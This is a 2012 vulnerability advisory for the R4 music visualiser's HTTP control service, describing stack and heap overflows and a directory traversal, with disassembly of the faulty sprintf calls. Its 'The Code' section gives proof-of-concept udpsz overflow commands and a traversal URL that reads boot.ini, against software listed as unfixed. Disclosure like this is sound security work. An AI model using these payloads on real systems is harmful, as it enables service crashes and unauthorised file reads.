####################################################################### Luigi Auriemma Application: R4 http://r4.rabidhamster.org/R4/ Versions: <= 1.25 Platforms: Windows Bugs: A] stack overflow B] heap overflow C] directory traversal D] screenshot stack overflow Exploitation: remote Date: 09 Feb 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "R4 is a standalone OpenGL accelerated program which aims to produce animated 3D graphics in real-time that twist and turn with the music." It's very used in parties and other events in which are needed 3d animations based on the current music. ####################################################################### ======= 2) Bugs ======= R4 has an http service disabled by default which allows to control it from remote, all the following vulnerabilities are located in this component. ----------------- A] stack overflow ----------------- Buffer overflow caused by the calling of sprintf() for generating a log string using the HTTP arguments received from the client in a stack buffer of 2 kilobytes: 0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4] 0041ECD4 |. 81EC 00080000 SUB ESP,800 0041ECDA |. 85D2 TEST EDX,EDX 0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3 0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34 0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808] 0041ECEA |. 85C9 TEST ECX,ECX 0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3 0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34 0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C] 0041ECFA |. 85C0 TEST EAX,EAX 0041ECFC |. 74 2E JE SHORT R4.0041ED2C 0041ECFE |. 53 PUSH EBX 0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX] 0041ED01 |. 84DB TEST BL,BL 0041ED03 |. 5B POP EBX 0041ED04 |. 74 26 JE SHORT R4.0041ED2C 0041ED06 |. 50 PUSH EAX 0041ED07 |. 51 PUSH ECX 0041ED08 |. 52 PUSH EDX 0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C] 0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]" 0041ED12 |. 50 PUSH EAX ; stack buffer 0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf() 0041ED18 |. 83C4 14 ADD ESP,14 0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP] 0041ED1F |. 52 PUSH EDX 0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50 0041ED25 |. 81C4 04080000 ADD ESP,804 0041ED2B |. C3 RETN ---------------- B] heap overflow ---------------- Heap overflow/corruption caused by a long HTTP URI. ---------------------- C] directory traversal ---------------------- Directory traversal exploitable through the "loadfile" script command that can be executed from left_console.html and allows to view the files on the disk in which is installed the software. ---------------------------- D] screenshot stack overflow ---------------------------- Stack overflow through the "miniscreenshot" command: 0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4] 0040B984 . 81EC 04010000 SUB ESP,104 ... 0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10] 0040BA25 . 56 PUSH ESI 0040BA26 . 52 PUSH EDX 0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14] 0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg" 0040BA30 . 50 PUSH EAX ; stack buffer 0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf() ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip A] udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000 B] udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000 C] http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini]) D] udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################